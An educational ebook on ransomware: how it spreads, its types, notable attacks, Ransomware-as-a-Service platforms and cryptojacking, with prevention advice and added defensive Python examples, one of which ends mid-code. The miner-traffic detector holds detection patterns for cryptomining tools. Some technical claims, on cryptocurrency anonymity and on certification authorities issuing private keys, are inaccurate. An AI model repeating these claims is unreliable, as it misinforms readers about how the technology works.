Ransomware · Once such malicious software takes over your system, you'll be unable to access your...


Ransomware

How Ransomware Attacks Work

ANYALEBECHI ELISHA


CONTENT

PART ONE:

How Ransomware Attacks Work

PART TWO:

Ransomware as a Service

PART THREE:

Transition to Cryptojacking


INTRODUCTION

Welcome.

Ransomware is one of the major cyber threats today. In recent years, ransomware attacks have become very common. Hackers use them to make money.

A ransomware attack is a type of malware attack in which the malware holds the victim’s files for ransom.

The victim is denied access to his files or computer until he pays the ransom.

Ransomware is an interesting topic.

This book is designed to take you through all you need to know about ransomware attacks.

Part one explains how a ransomware attack works and gives some examples of ransomware attacks.

Part two teaches Ransomware as a Service (RaaS). RaaS is a malicious business model: hackers sell ransomware attack kits to people who are interested in deploying attacks with them. This is just like the Software as a Service business model.

The last part is dedicated to cryptojacking. Cryptojacking is another form of malware attack.

It is the malicious act of mining cryptocurrency with a victim’s device without his consent. Hackers install cryptojacking malware on victims’ devices and use them to mine cryptocurrency.

Throughout, you will learn how to prevent ransomware attacks.

Enjoy!


PART ONE

HOW RANSOMWARE ATTACKS WORK

A ransomware attack is a type of malware attack in which the victim’s access to their computer or files is denied and the victim is required to pay a ransom to regain access. The malware locks the victim out of his files by encrypting them; the encrypted files can only be unlocked with a decryption key. The attackers lock the victim out and demand a ransom before they release the decryption key with which the victim can unlock the files. Simply put, ransomware (ransom malware) infects a computer, encrypts files, denies the owner access to the files, and demands money before access is restored. Access is restored by giving the victim a decryption key to decrypt the encrypted files. Once such malicious software takes over your system, you'll be unable to access your computer or files. Malicious actors behind ransomware attacks demand to be paid in cryptocurrency. This is because cryptocurrency transactions are encrypted using cryptography, so the transactions are anonymous. They choose to be paid in cryptocurrency because it helps them maintain anonymity and avoid getting caught. The attackers always promise to restore access as soon as the ransom is paid, but these criminals can’t be trusted. They promise to release the decryption keys to victims as soon as they pay up, but there is no guarantee they will restore access upon payment. After all, they are criminals and anything can happen. When ransomware encrypts files, it displays a ransom note on the computer screen. The ransom note explains to the victim how to pay the ransom and regain access to his computer or files. Different attack groups and ransomware families have their own ransom note, and the amount they demand differs as well. But they always demand an amount an organization or average individual can pay without looking back. In order to have a clear understanding of how ransomware works, you need to understand Public Key Cryptography.

What is Public Key Cryptography? Public Key Cryptography (PKC) is a cryptographic technique that works with two keys: a public key and a private key. The private key is kept secret and belongs solely to one person. The public key, on the other hand, is public and can be shared. The public key is used to encrypt a message, and a message encrypted with a public key can only be decrypted using the corresponding private key. This technique is used to share sensitive data. When you want to share sensitive information, you can encrypt the message so that nobody except those you grant access can read it. When you want to share confidential data, you encrypt it using the recipient’s public key. Such a message can only be read or decrypted using the corresponding private key, which is held by the recipient whose public key was used to encrypt the message.


Cryptographic technology is used to protect data against unauthorized access or use. Those who use this technology obtain public and private keys from certification authorities. When people want to send an encrypted message to a recipient, they request the recipient’s public key; it can also be obtained from a public key directory. The public key is used to encrypt the message. When the recipient receives the message, he decrypts it using his private key. Remember, the private key is kept secret. PKC has led to amazing advances on the internet. Malicious actors also use this technology to wreak havoc in the digital world. PKC was used to create malicious software called a cryptovirus. When this virus infects a computer, it uses PKC to encrypt the files on the computer. The encryption can only be undone using the corresponding private key. Once this is achieved, the hacker holds the files for ransom and demands to be paid before providing the decryption key. This is what’s known as ransomware: a malware that holds files for ransom.

Brief History of Ransomware

Ransomware has been a long-standing internet problem, and there have been many recorded ransomware attacks. The AIDS Trojan was the very first ransomware virus, created in 1989 by the Harvard-trained Joseph L. Popp. 20,000 infected diskettes were circulated to attendees of the WHO's international AIDS conference. The ransomware, known as PC Cyborg or the AIDS Trojan, encrypted files on the PC and demanded that the user pay $189 by mail to PC Cyborg Corp.

The encryption used was not complicated and was not hard to decrypt. More than a decade later, ransomware attacks had become far more common. Another wave of ransomware arrived in 2007. Winlock denied people access to their desktops. This was not file encryption; people were entirely locked out of their computers. It demanded payment through a paid SMS before access could be restored. A new form of ransomware was developed in 2012: law enforcement ransomware, developed by a group called Reveton. It locked victims out of their desktops and showed them an official-looking page from a law enforcement agency (e.g., the FBI). It accused the victims of committing a crime and demanded that a fine be paid before access could be restored. Victims were accused of crimes such as child pornography, hacking or illegal file download. Criminals used this social engineering tactic to trick victims into paying a ransom, thinking they were under investigation by a law enforcement agency. In 2013, CryptoLocker reintroduced encrypting ransomware. It used strong encryption, which made it very difficult for victims to regain their files without paying the ransom. Since then, malicious actors have seen ransomware as a profitable business, and there have been countless major ransomware attacks. Terrible attacks such as WannaCry in May 2017 and Petya in June 2017 used strong encryption to shake victims across the globe.


How Ransomware Spreads

The best approach to ransomware is to prevent infection, because once a system is infected, getting rid of the malware is a tough task. To be able to prevent ransomware attacks, you need to understand how it spreads. Here's the breakdown of how ransomware spreads:

Social Engineering

Criminals use social engineering tactics to lure potential victims into downloading ransom malware. There are many tactics ransomware writers can use to deliver the malware to their targets.

Phishing Attack

A phishing attack is a common tactic used to deliver ransomware to a target's system. It comes in the form of malspam: an email carrying an attachment or a malicious link, with the attachment masked as a legitimate file. Once the file is downloaded and opened, the malware activates and begins operating on the victim’s computer. Attackers employ these social engineering strategies to trick potential victims into clicking malicious links or downloading malicious files.


Let’s look at how it works:

The victim is tricked into clicking a malicious link and/or downloading a malicious file.

Criminals disguise the ransomware and present it to a potential victim as a legitimate file (software, an MS Word file, a PDF file, etc.). They also present a link that looks helpful but is in reality a download link for the ransom malware. Cyber criminals find a way of luring the user into downloading such files or clicking such links.

Once the file is downloaded and opened or the link is clicked, the ransomware installs on the victim’s computer and begins encrypting files.

When the encryption is complete, the ransomware displays a ransom note on the screen. The ransom note tells the victim how to pay the ransom and how to get the decryption key after payment is made.

Exploit Kit

This is a strategy where cyber criminals search for vulnerabilities in computer systems. A security loophole or unpatched point in software or a computer system serves as a point of infection. Criminals exploit such loopholes to deliver ransomware. In this case, the user does not need to click a link or download an attachment to be infected.

Exploit kits allow ransomware attackers to exploit users via a compromised website they have broken into. Attackers upload malicious code to the compromised website, which is then used to exploit security loopholes in visitors’ browsers and other software running on their devices.

Let’s look at how it works:

A potential victim clicks a link on a legitimate website that directs them to a compromised website. The compromised landing page carries hidden exploit code. The hidden exploit code scans the operating system of the visitor’s device and the software running on it for any vulnerability or security loophole it can exploit. Once the exploit code finds a vulnerable point, it injects ransomware into the device.

Such exploit code is difficult for security systems to detect, which is what makes it so dangerous. It has ways of evading detection by antivirus systems.

Once the ransomware is injected into the vulnerable device, it activates and starts encrypting. It displays a ransom note when it is through encrypting the files.

Types of Ransomware

Leakware
Encrypting Ransomware
Screen Lockers
Scareware

Leakware

It is also known as doxware. This type of ransomware attack occurs when malicious actors threaten to publish the victim’s files online if the victim refuses to pay the ransom.

This poses a serious threat to companies that have classified information they wouldn’t want published online. Such companies are tempted to pay the ransom in order not to have their sensitive data published. But there are questions that run through my mind as I write this. Will the criminals destroy the data after the ransom is paid? Even when they allow victims to regain access to their files, won’t they retain copies? Don’t you think they can still go ahead and publish the files online or sell them on the dark web after receiving the ransom? The point is this: they are criminals, and as a result they are capable of anything.

Encrypting Ransomware

This form of ransomware works by encrypting the victim’s files and demanding a ransom. Attackers use strong encryption, which makes the files very difficult to decrypt. Victims are not given access until they pay the ransom. Remember, paying the ransom does not guarantee access. This is why some organizations choose to clean up their systems and restore their files from backup instead of paying the ransom.

Screen Lockers

Screen lockers, as the name suggests, lock people out of their devices. They lock the screen and deny people access to their files and applications, displaying a full-screen window telling victims to pay before access will be granted. Often, attackers pose as the FBI or another law enforcement agency, claiming that unethical activity has been noticed on the victim's computer and that, consequently, the victim must pay a fine before regaining full access to his computer.

Scareware

Scareware poses as a cleaning tool or cyber security software that has discovered a problem on your computer, and it requests payment in order to take care of the security problem. Some scareware locks your computer, but many don’t. Scareware floods the victim’s screen with alerts and pop-up messages telling the victim to make a payment in order to clean up his system. Come to think of it, do you think a legitimate cyber security firm would beg and pester you to pay for and use their security software? No. Not at all! No reasonable company would do that.

Examples of Ransomware Attacks

There are countless incidents of ransomware attacks, and many have been recorded. In this section, I’ll take you through some popular ransomware attacks that made a big name in the world of cyber security.

1. WannaCry Ransomware

WannaCry ransomware became notorious in May 2017. It attacked Windows systems. It is a worm (a cryptoworm) that encrypts the victim’s data and demands a ransom in bitcoin. WannaCry took advantage of a security loophole in Microsoft Windows: its authors exploited an unpatched vulnerability, and many high-profile companies and health institutions were affected. This shows the importance of updating applications. Outdated applications may have loopholes.


2. SamSam Ransomware

This type of ransomware is used to carry out targeted attacks. It gains access to a network and encrypts the systems on it. The people behind this ransomware demand a high-value ransom. This ransomware selects its victims: they target companies they deem capable of paying. SamSam takes advantage of security shortfalls. It also uses brute-force techniques against weak Remote Desktop Protocol passwords. Let’s take a look at what Malwarebytes Labs has to say about SamSam ransomware: “SamSam ransomware is a custom infection used in targeted attacks often deployed using a wide range of exploits or brute-force tactics. In 2018, SamSam uses either vulnerabilities in Remote Desktop Protocols, Java-based Web Servers, or File Transfer Protocol (FTP) Servers to gain access to the victim’s network or brute force against weak passwords to obtain an initial foothold.”

3. BadRabbit Ransomware

This one locks a victim out of his computer and demands money to restore access. It uses social engineering to trick users into clicking a malicious link: it falsely alerts a potential victim that their Adobe Flash Player requires an update, and users download the ransomware when they click the link to update it. The malicious code is inserted into the HTML skeleton or Java files of insecure websites. Once a user clicks the link (hoping to download a software update), the malware downloads onto the victim’s computer. Usually, the attackers demand about $280 to be paid within a 40-hour deadline. Records show that this ransomware attack was mainly prevalent in Russia and Ukraine.


4. Petya Ransomware

It targets the Windows operating system. It infects the system and displays a ransom note that explains how to make the payment. Petya is a worm and spreads to other networks by self-propagation, which helps it achieve widespread infection. While researching this topic, I came across an interesting piece by CSO Online: “… If you make the extremely bad decision to agree to this request, Petya will reboot your computer. You'll see what looks like the standard Windows CHKDSK screen you expect to see after a system crash. Rather than searching out specific files and encrypting them, like most ransomware does, it installs its own boot loader, overwriting the affected system’s master boot record, then encrypts the master file table, which is the part of the file system that serves as sort of roadmap for the hard drive. In essence, your files are still there and still unencrypted but the computer can’t access the part of the system that tells it where they are, so they might as well be lost. At this point, the ransomware demands a bitcoin payment in order to decrypt the hard drive” – CSO Online

5. GoldenEye Ransomware

GoldenEye infects victims through a Microsoft Office document delivered via email. The attackers employ phishing tactics to lure victims into downloading the malicious document. After encrypting the victim’s files, they demand a ransom and give a 96-hour deadline.


How to Protect Yourself & Organization from Ransomware Attack

Awareness

Education remains the best approach to ransomware prevention. You have to educate yourself and your organization on this subject. Human beings are the last line of defense. Everyone should be educated on how cyber attackers deploy ransomware attacks. Make sure you train your employees well: they should be able to spot malicious attachments and links, because attackers use social engineering to lure victims into installing malware. Give yourself and your organization enough training.

Invest in Cyber Security

Prevention is better than cure. You have to protect your business with standard security systems. Many fail to do this, but then spend a lot of money on disaster recovery when they fall victim to a cyber attack. Instead of allowing yourself or your business to be attacked, it’s expedient to invest in a standard security system from the start. Taking preventive measures remains the best approach.

Back Up Your Files on a Regular Basis

This is very important. Back up your files on a regular basis, and make sure you disconnect the backup drive from your network immediately after the backup; it can get infected if you leave it connected. You can also use cloud services. Whichever way, the main thing is that you have a backup of your files. This lets you recover from an attack without losing precious data.

With backups, you just need to clean up the infection and restore your files from backup. Companies with a strict backup policy don’t panic when attacked, simply because they know how to recover.
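As an added example (not from the book), the Python script below shows the check a practitioner wants after the advice above: a hash manifest built when the backup is taken, and a verification step that flags files that have gone missing, changed, or now look encrypted (high byte entropy) on a drive that stayed connected. The directory layout, file contents and the 7.5-bit entropy threshold are constructed assumptions.

```python
import hashlib
import json
import math
import os
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; plain text sits around 4-5, ciphertext near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_encrypted(path: Path, threshold: float = 7.5) -> bool:
    """Heuristic: the first 64 KiB of an encrypted file is close to random."""
    with open(path, "rb") as f:
        sample = f.read(1 << 16)
    return len(sample) >= 256 and shannon_entropy(sample) > threshold


def build_manifest(root: Path) -> dict[str, str]:
    """Relative path -> SHA-256 for every file under root, taken at backup time."""
    return {str(p.relative_to(root)): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_restore(root: Path, manifest: dict[str, str]) -> dict[str, list[str]]:
    """Compare the backup tree against its manifest before trusting a restore."""
    report = {"missing": [], "modified": [], "suspicious": [], "extra": []}
    current = build_manifest(root)
    for rel, digest in manifest.items():
        if rel not in current:
            report["missing"].append(rel)
        elif current[rel] != digest:
            report["modified"].append(rel)
            if looks_encrypted(root / rel):
                report["suspicious"].append(rel)   # changed AND now high-entropy
    report["extra"] = sorted(set(current) - set(manifest))  # e.g. a dropped note file
    return report


def demo() -> dict[str, list[str]]:
    """Constructed scenario: take a backup, then simulate a connected drive being hit."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "backup"
        (root / "docs").mkdir(parents=True)
        (root / "docs" / "report.txt").write_text("quarterly report line\n" * 200)
        (root / "docs" / "notes.txt").write_text("meeting notes\n" * 100)
        (root / "config.ini").write_text("[app]\nmode=prod\n")
        manifest = build_manifest(root)
        # In real use, keep the manifest off the backup medium (or sign it).
        saved = json.dumps(manifest)
        # Simulated damage: one file overwritten with random bytes, one deleted,
        # and an unexpected note file dropped in the root.
        (root / "docs" / "report.txt").write_bytes(os.urandom(4096))
        (root / "docs" / "notes.txt").unlink()
        (root / "HOW_TO_RECOVER.txt").write_text("constructed placeholder note\n")
        return verify_restore(root, json.loads(saved))


if __name__ == "__main__":
    for category, files in demo().items():
        print(f"{category}: {files}")
```

Any file in "suspicious" should be treated as unusable until a clean copy is found, and a non-empty "extra" list on a backup volume is itself a sign that the drive was reachable during the attack.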

Update Your Operating System and Applications

Unpatched software is prone to attack. If you fail to install new updates to your operating system and applications, you give hackers the chance to find vulnerabilities in your system. WannaCry ransomware took advantage of an unpatched vulnerability in Microsoft Windows. The company had already released a patch, but the victims had not applied it. It’s a tough task to keep track of all software updates, but you can make the work easier by turning on the auto-update function, which allows applications to update automatically. Malicious hackers are always searching for vulnerabilities to exploit. Keep your operating systems and applications up to date. Remember that anti-virus programs should be kept up to date too. When an anti-malware program is outdated, it loses sensitivity: the security program may not be able to identify the most recent strains of malware.

Don’t Download Software from Sites That Are Not Trustworthy

Don’t install software from unknown or unauthorized sources. If you don’t trust the source, don’t download it. Distributing malicious software is one of the popular ways cyber criminals lure users into installing ransomware.

Don’t give unfamiliar software administrative privileges. Giving a program administrative privileges provides a fertile ground for a malicious program to exploit you to the fullest.

Inspect Every Email Attachment

Malspam is used to distribute malware. Don’t open email attachments automatically; doing so makes you more vulnerable to malware attacks. Attachments need to be inspected thoroughly before they are opened, especially when the email is from an unknown source. If the email is suspicious, treat it as such. Don’t open an attachment because of a catchy title or because it looks familiar (coming from an institution you know). Thorough inspection should always be carried out.
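As an added example (not from the book), here is a small Python triage script that applies the inspection above, and the phishing delivery described in Part One, to a constructed malspam message: it checks each attachment's declared name against its actual leading bytes and flags risky or double extensions. The sample message, the magic-byte table and the extension lists are the example's own assumptions.

```python
import email
from email import policy
from email.message import EmailMessage

# Leading bytes that identify common attachment formats (example's own table).
MAGIC = {
    b"MZ": "exe",                # Windows executable (.exe, .scr, .dll)
    b"%PDF": "pdf",
    b"PK\x03\x04": "zip",        # also .docx/.xlsx/.docm and other Office Open XML
    b"\xd0\xcf\x11\xe0": "ole",  # legacy .doc/.xls
}
# Extensions that can run code when opened; treat with suspicion in email.
RISKY_EXTS = {"exe", "scr", "js", "vbs", "bat", "cmd", "ps1", "hta",
              "jar", "lnk", "iso", "docm", "xlsm", "pptm"}
# Document-looking extensions attackers place before the real one ("Invoice.pdf.exe").
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
# What the content should look like for a given extension.
EXPECTED_KIND = {
    "pdf": {"pdf"}, "exe": {"exe"}, "scr": {"exe"}, "zip": {"zip"},
    "docx": {"zip"}, "xlsx": {"zip"}, "pptx": {"zip"},
    "docm": {"zip"}, "xlsm": {"zip"}, "pptm": {"zip"},
    "doc": {"ole"}, "xls": {"ole"}, "ppt": {"ole"},
}


def sniff(data: bytes) -> str:
    """Classify attachment content by its leading bytes, not by its name."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def inspect_attachment(filename: str, data: bytes) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if len(parts) > 2 and parts[-2] in DOCUMENT_EXTS:
        findings.append(f"double extension .{parts[-2]}.{ext}")
    if ext in RISKY_EXTS:
        findings.append(f"risky type .{ext}")
    kind = sniff(data)
    expected = EXPECTED_KIND.get(ext)
    if expected and kind not in expected:
        findings.append(f"content looks like {kind}, not .{ext}")
    elif not expected and kind == "exe":
        findings.append(f"executable content behind .{ext or '(none)'}")
    return findings


def triage_eml(raw: bytes) -> dict[str, list[str]]:
    """Parse a raw RFC 5322 message and inspect every attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""
        report[name] = inspect_attachment(name, data)
    return report


# Constructed sample (not a real campaign): a fake invoice mail carrying an
# executable disguised as a PDF, a macro-enabled document and one clean PDF.
EXE_STUB = b"MZ" + b"\x90" * 62 + b"This program cannot be run in DOS mode"


def build_sample_eml() -> bytes:
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Invoice overdue - open attached"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(EXE_STUB, maintype="application", subtype="pdf",
                       filename="Invoice.pdf.exe")
    msg.add_attachment(b"PK\x03\x04" + b"\x00" * 16, maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12",
                       filename="Invoice.docm")
    msg.add_attachment(b"%PDF-1.4\n", maintype="application",
                       subtype="pdf", filename="terms.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, findings in triage_eml(build_sample_eml()).items():
        print(name, "->", findings or "clean")
```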

Embrace Cloud Services

This is a good option if you can’t cope with the demands of complex cyber security strategies. There are some reliable cloud services out there; use them and leave the cyber security worries to them. Companies and individuals are advised to upload their sensitive files to the cloud, which makes it easy to recover from an attack. Embracing a cloud service does not replace the need for an employee awareness program. You shouldn’t be careless just because your files are secure in the cloud.


How to Respond to Ransomware Attack

Identify the Type of Ransomware

This is a very important step. You have to identify the type of ransomware. Every ransom malware has unique features, and understanding the malware is an essential step towards getting rid of it. Knowing how the ransomware works helps in planning the appropriate security measures. Cyber security experts will be of more help once they succeed in identifying the ransomware and how it works.

Don’t Pay the Ransom

Companies are tempted to pay the ransom in order to regain access to their data and stabilize their business. They compare the cost of cleaning up an attack with the ransom, and often conclude that paying the ransom is preferable to the pain of rebuilding their systems. Even companies that have policies against paying the ransom end up paying when they are hit. Ransomware attacks put organizations in a tight corner. But there is something noteworthy: paying the ransom does not guarantee access to your files. The criminals may still refuse to release the decryption key after receiving payment.

Also, remember that some ransomware destroys files while encrypting them. This is why having a reliable backup is very important. The best approach is not to pay the ransom. The FBI advises that no one should pay the ransom, on the logic that paying will encourage attackers to launch more attacks. Lack of an adequate backup is what compels victims to consider paying the ransom.

Solicit Assistance of Security Experts

There are experts in this field, and they are in a good position to give appropriate advice. Ransomware is a threat that requires great care. Don’t take major actions without consulting experts; this will save you the pain of wrong decisions. Experts will help you map out effective strategies to recover from any type of malware attack.

Free Decryptors

Not every ransomware has a free decryptor, but some can be neutralized using one. Experts have been able to come up with free decryptors for some widely studied ransomware. This must be done after a thorough examination of the ransomware: the ransomware has to be correctly identified before a decryptor is applied, because using the wrong decryption tool can encrypt your files further. Applying the wrong decryption tool has negative effects, so there is a need to identify the ransomware in order to deploy the appropriate decryption tool.


Clean Up Infection and Restore Your Files

Disaster recovery can be painful, but it is bearable if you have a complete backup of your files. In this case, you have to scan your system, get rid of the malware and restore your files from backup. This can be complicated depending on the type of ransomware, the level of encryption and the type of system or network affected. Some ransomware renders the computer useless, meaning the computer may not be usable even after scanning. An example of such ransom malware is NotPetya. NotPetya destroys the computers it infects, which explains why it’s not considered true ransomware: the creators of NotPetya are not interested in the money. The extent of an attack informs the disaster recovery strategy. A complicated attack will require a corresponding recovery strategy. A company whose whole network is attacked has more to clean up than a company where two or three computers are affected.


PART TWO

Ransomware as a Service

Ransomware as a Service borrows its model from SaaS. It is a situation whereby ransomware creators distribute ransomware kits to affiliates, making it easy for them to launch attacks, and receive a percentage of the ransom in return. In this case, people who know nothing about coding can simply buy the malware and launch attacks. RaaS is set up so that the creators provide the affiliates with everything they need to launch a successful attack. They advertise their business on the dark web and host tutorials for those interested in what they offer. They design their service so that an affiliate has a login dashboard from which he or she can fully partake of what the malicious actor has to offer.

How it Works

Just like SaaS vendors, RaaS vendors create a vendor platform (a website) and offer their services on the dark web. They create a website where affiliates can sign up and get access to ransomware attack kits. Instead of going through the stress of writing code, RaaS vendors make it easy for people to carry out attacks. Once an affiliate signs up, he or she has access to attack tools.

RaaS vendors design their platforms just the way legitimate businesses design theirs. They have dashboards to monitor the progress of affiliates. Money made from attacks is divided between the affiliates and the owner of the platform; how the money is shared depends on each platform’s policy, and information regarding money is available to the user. Criminals advertise this dirty business and run tutorials, just like legitimate businesses, teaching people how to make use of their services.

Examples of RaaS Platforms

Philadelphia

The criminal organization behind this RaaS operation is The Rainmakers Labs. They created the ransomware tools and sold the attack kit for $400. With $400, anyone who is interested is furnished with the tools to launch ransomware attacks. The Rainmakers Labs runs its business just like a legitimate SaaS company. Before creating Philadelphia, Rainmakers Labs came up with Stampado, which was sold for $39. Philadelphia was spread by malicious emails, and it targeted hospitals; they attacked hospitals in Washington and Oregon. Philadelphia is packaged just like legitimate software. It has promotional videos on YouTube and a detailed guide on a .com website, with a section where they teach affiliates how to make use of the platform. Information about Philadelphia is open on the World Wide Web. This is unlike other RaaS platforms, most of which do their ugly business primarily on the dark web.


Satan

Satan is another RaaS platform. Here is how it works. Joining is free. The operators keep 30% of each ransom and pay the remaining 70% to the affiliate. A new member signs up, then follows a defined process to generate a new ransomware build. The build has to be downloaded before it can be used to infect anyone; after downloading it, the affiliate distributes it and launches attacks. Satan is highly customizable: a member sets his own ransom price, carries out the attack as he wishes and gives victims customized conditions. The platform collects the ransom, pays out the affiliate's 70% and provides the decryption tool to victims who pay. Like Philadelphia, Satan operates like a legitimate software company and provides the support members need to carry out successful attacks. The operators do the hard, technical part of the job, which makes launching a ransomware attack an easy process for affiliates.

Cerber

The Cerber platform takes a 40% cut of the ransom. Affiliates sign up and do the work of finding victims. Cerber is selective about the countries it targets: it deactivates itself when it finds it has infected a computer in certain countries, such as Armenia, Azerbaijan and Belarus.

RaaSBerry


RaaSBerry, like the other RaaS platforms, sells a ransomware kit that is ready to distribute, but it does so on a subscription basis. It offers five packages; the price depends on the features of the kit and the length of the command-and-control (C&C) server subscription. The packages are customizable and are pre-compiled with a Bitcoin address that the affiliate provides, so the ransom is paid directly to the affiliate's own wallet. RaaSBerry encrypts each victim's files with a unique 256-bit AES key generated on the fly; the AES key is then encrypted with the affiliate's unique RSA key, so the files cannot be recovered without the matching RSA private key. RaaSBerry offers the following packages:

Plastic: one month C&C subscription - $60
Bronze: three months C&C subscription - $150
Silver: six months C&C subscription - $250
Gold: one year C&C subscription - $400
Platinum: three years C&C subscription - $650

The packages use polymorphic techniques, an evasion strategy meant to defeat signature-based antivirus detection. Unlike some other schemes, RaaSBerry decrypts files automatically when the victim pays: the kit detects the payment and starts the decryption process on its own. The affiliate specifies the ransom amount, and the package adds a small, randomly generated amount to it so that each victim's payment is unique and can be matched to that victim. The ransom note can be displayed in different languages.

Atom

Atom is a rebranded version of the Shark RaaS platform with added features. It pays 80% of the ransom to affiliates. The payment process is automated: the ransom goes to the developers' Bitcoin wallet, and they promise to pay members their share automatically. Atom tracks each affiliate's progress with an affiliate tracking ID, which is what the operators use to follow a member's activity.

Page 29: Ransomware · Once such malicious software takes over your system, you'll be unable to access your computer or files. Malicious actors behind ransomware attacks demand to be paid

PART THREE

TRANSITION TO CRYPTOJACKING

HOW CRYPTOJACKING WORKS

Cryptojacking is the malicious act of mining cryptocurrency with someone else's device without the owner's consent: the stealthy theft of computing resources to mine cryptocurrency. Malicious actors infect users' devices with cryptomining malware and mine cryptocurrency with the victims' devices without their knowledge. The cryptomining malware stays undetected in the background and uses the computing resources of the infected computer to mine coins while the computer runs its normal tasks. In most cases this slows the computer down. Cryptomining scripts do not damage the victim's files, but they use the CPU to run the mining computations and send the results to a server the attacker controls. This is not limited to computers; it affects mobile devices as well.

Understanding Cryptomining

Cryptomining means solving a computationally hard puzzle. It requires a computer and special mining software. For proof-of-work currencies such as Bitcoin and Monero, the puzzle is to find a value (a nonce) that, hashed together with the pending block of transactions, produces a hash below a target set by the network; there is no shortcut, so miners simply try values as fast as they can.


Whoever finds a valid answer first receives a reward in cryptocurrency, so miners compete fiercely to solve the puzzle. This makes cryptomining very competitive and capital intensive: it takes a great deal of computing power to solve the puzzle faster than everyone else. Those who invest in mining buy dedicated hardware, which is not only expensive but also drives up the electricity bill.

Why Cryptojacking Cases Increased Significantly in 2018

According to a report released by IBM, ransomware attacks decreased by 45 percent in 2018 while cryptojacking increased by 450 percent over the same period.

Experts were surprised at how sharply cryptojacking soared. Let us look at why cryptojacking attacks rose at the same time as ransomware attacks declined.

Hackers Prefer It

Cryptojacking can go undetected for a long time, and it does not stop the user from using the computer. Hackers therefore deemed it more profitable: they keep making money without making much noise. Ransomware, by contrast, has to announce itself in order to pressure the victim into paying.

Continuous Income

In a ransomware attack the victim pays the ransom once, and in some cases the victim chooses not to pay at all. In cryptojacking, the hackers keep making money for as long as they stay undetected.

It Makes Mining Coins Less Capital Intensive

Cryptomining is very capital intensive because it requires huge computing power. By stealing the computing resources of victims' devices, criminals mine coins at little expense. Installing cryptomining scripts on thousands of computers creates a large distributed mining network, and the more devices work for the attacker, the more coins he mines. The attacker points all the compromised computers at a central mining server (a mining pool, or a proxy he controls in front of one) and combines their processing power. This spares him the cost of buying and maintaining mining hardware. In short, malicious cryptominers consider cryptojacking a very lucrative, low-effort way of making money.

How it Works

Cryptojacking works by planting a cryptomining script on a computer or in a browser. Once that happens, the hackers start mining cryptocurrency with the machine's resources. This happens in two major ways:

In the first, the hacker tricks you into clicking a malicious link, usually sent in a spam email. Once the potential victim clicks the link, the mining code loads on the victim's device and the hacker can start using it to mine cryptocurrency. The second is browser-based cryptojacking, also known as drive-by cryptomining.


Criminals inject the mining code into a website, or into an ad delivered to numerous websites. When you visit such a compromised website, the cryptojacking code loads in your browser and starts mining; likewise, when an infected ad is displayed, the code executes automatically in your browser. In some variants the mining continues even after the victim leaves the website or apparently closes the browser: a hidden window (a pop-under, sized and positioned so that it stays out of sight) remains open and keeps mining in the background. Attackers try to compromise as many devices as possible and form a pool (a botnet) of them; the hackers coordinate the botnet and use it to mine cryptocurrency.
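The "central server" the compromised machines report to is a mining pool, or a proxy in front of one, and the miner talks to it over the Stratum protocol (JSON-RPC lines over TCP). The following added Python example, written for this edition and not taken from the page or from any product, shows how a defender can spot that traffic in captured flow data. The flow records and addresses are constructed; the method names are those of the Stratum v1 and Monero/XMRig dialects, and the port list is only a heuristic, used here to corroborate a payload match rather than to flag on its own.

```python
import json
from dataclasses import dataclass

# Added example: recognising miner-to-pool (Stratum) traffic in flow records.
# Method names are from the Stratum v1 dialect (mining.*) and the Monero/XMRig
# dialect (login/getjob/submit/job/keepalived). The port list is a heuristic.
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit", "mining.notify",
    "mining.set_difficulty", "login", "getjob", "submit", "job", "keepalived",
}
MINER_AGENT_PREFIXES = ("XMRig", "xmr-stak", "cpuminer", "ccminer")
COMMON_POOL_PORTS = {3333, 4444, 5555, 7777, 8888, 9999, 14444, 45700}


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    payload: str  # first application-layer line seen on the flow


def payload_indicators(payload):
    """Indicators that can only come from the bytes on the wire."""
    hits = []
    try:
        msg = json.loads(payload)
    except ValueError:
        return hits
    if not isinstance(msg, dict):
        return hits
    method = msg.get("method")
    if method in STRATUM_METHODS:
        hits.append(f"stratum method {method}")
    params = msg.get("params")
    if isinstance(params, dict):
        agent = str(params.get("agent", ""))
        if agent.startswith(MINER_AGENT_PREFIXES):
            hits.append(f"miner agent {agent}")
        login = str(params.get("login", ""))
        # Monero wallet addresses are 95 (standard) or 106 (integrated) chars
        # and start with 4 or 8; miners send the wallet as the login name.
        if len(login) in (95, 106) and login[0] in "48":
            hits.append("Monero address used as login")
    return hits


def assess_flow(flow):
    """Payload indicators plus, only when there is at least one, the port."""
    hits = payload_indicators(flow.payload)
    if hits and flow.dport in COMMON_POOL_PORTS:
        hits.append(f"common pool port {flow.dport}")
    return hits


def scan(flows):
    """Return (flow, indicators) for every flow that looks like miner traffic."""
    results = []
    for flow in flows:
        hits = assess_flow(flow)
        if hits:
            results.append((flow, hits))
    return results


# Constructed sample flows (fake addresses, fake wallet of the right shape).
FAKE_XMR_ADDRESS = "4" + "A" * 94
SAMPLE_FLOWS = [
    Flow("10.0.0.12", "203.0.113.5", 14444,
         json.dumps({"id": 1, "jsonrpc": "2.0", "method": "login",
                     "params": {"login": FAKE_XMR_ADDRESS, "pass": "x",
                                "agent": "XMRig/6.16.4"}})),
    Flow("10.0.0.20", "198.51.100.7", 3333,
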